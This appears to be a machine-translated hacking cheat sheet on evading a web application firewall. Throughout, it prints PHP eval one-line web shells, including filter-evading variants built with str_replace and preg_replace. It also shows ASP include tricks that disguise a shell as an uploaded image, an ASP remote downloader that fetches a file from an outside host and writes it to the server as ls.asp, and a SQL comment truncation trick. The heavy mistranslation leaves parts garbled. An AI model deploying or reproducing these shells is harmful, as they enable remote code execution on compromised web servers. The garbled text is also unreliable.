I. Horse articles are horses that can guard god before
2. injection, which can bypass the injection method
Iii. rules. You can design your own horses based on the filter rules of the guard God.
I. Ma Er
------ 1 ---------
<? Php
@ Eval
($ _ POST ['1']);?>
------ --------- 2 ---------
<Title> login </title> nono <? Php
Eval
($ _ POST
[1])
?>
------- No. 3 --------
<? Php $ a = str_replace (x, "", "axsxxsxexrxxt ");
$ A ($ _ POST ["c"]);?>
The kitchen knife can be directly connected without the need to construct a connection string and password c.
------- Similar to the dongle's inclusion method ---------------
A. asp version:
Save a sentence as XX.jpg. The uploaded address is... /Xxxxxx.jpg
When uploading an x. asp file, the content is <! -# Include file = "../xxxxxx.jpg"->
B. php version
For php:
<? Php
Include bytes 1.htm ";
?>
------ No. You can download ------------------
Remote download horse
<%
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http://www.xxx.com/123/1.txt#,false
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile Server. MapPath ("ls. asp"), 2
Set sGet = nothing
Set sPOST = nothing
%>
---------------------
Ii. Injection
/* % 00 */truncation
Select/* % 00 */* from admin;
---------------------
Iii. Rules
You can use the following methods:
<? Php
$ Code = 'base64'; // base64 encoding
$ X = str_replace ('F', "", "bfafsfef6f4f_ffdffeffcffoffdffef"); // string replacement
$ A = '/a/'; // regular rules
Preg_replace ($ a, 'E '. 'V '. 'A '. 'l '. '('. $ x. '('. $ code. ')', 'A'); // Regular Expression replacement
?>
Method bypass keyword Filtering